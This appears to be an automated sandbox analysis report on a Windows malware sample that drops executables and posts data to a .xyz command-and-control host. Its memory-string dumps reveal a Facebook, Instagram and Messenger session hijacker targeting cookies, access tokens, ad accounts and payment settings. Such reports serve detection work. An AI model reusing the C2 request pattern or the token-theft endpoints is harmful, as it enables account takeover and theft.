Analysis Report h1GodtbhC8.exe

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: h1GodtbhC8.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: h1GodtbhC8.exe	Virustotal: Detection: 27%			Perma Link
Source: h1GodtbhC8.exe	Metadefender: Detection: 16%			Perma Link
Source: h1GodtbhC8.exe	ReversingLabs: Detection: 64%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: h1GodtbhC8.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 15.2.1E1C360C582DF797.exe.4370000.4.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 6.2.aliens.exe.4450000.4.unpack	Avira: Label: TR/Patched.Ren.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,		6_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,		15_2_1001F720

Spreading:

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:			Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8D1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,		0_2_6D8D1C23
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,		0_2_6D8E0F62
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AA534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		1_2_008AA534
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BB820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		1_2_008BB820
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CA928 FindFirstFileExA,		1_2_008CA928
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00402D09 FindFirstFileA,		6_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		6_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_004066CC FindFirstFileA,FindClose,		6_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001A170 FindFirstFileA,FindClose,		6_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05867950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,		15_2_05867950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05865A90 FindFirstFileA,FindClose,		15_2_05865A90
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001A170 FindFirstFileA,FindClose,		15_2_1001A170

Networking:

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz

Found strings which match to known social media urls

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: ef6df4af06ba6896.xyz

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz

Urls found in memory or binary data

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/Ahy
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/F
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/NFh8
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009537921.0000000004287000.00000004.00000040.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/f
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/hy
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009113059.000000000277A000.00000004.00000020.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/g
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/w
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1003241141.00000000027C0000.00000004.00000001.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz:80/info/eCPI
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz:80/info/g
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz:80/info/wBCj
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009559041.000000000428C000.00000004.00000040.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
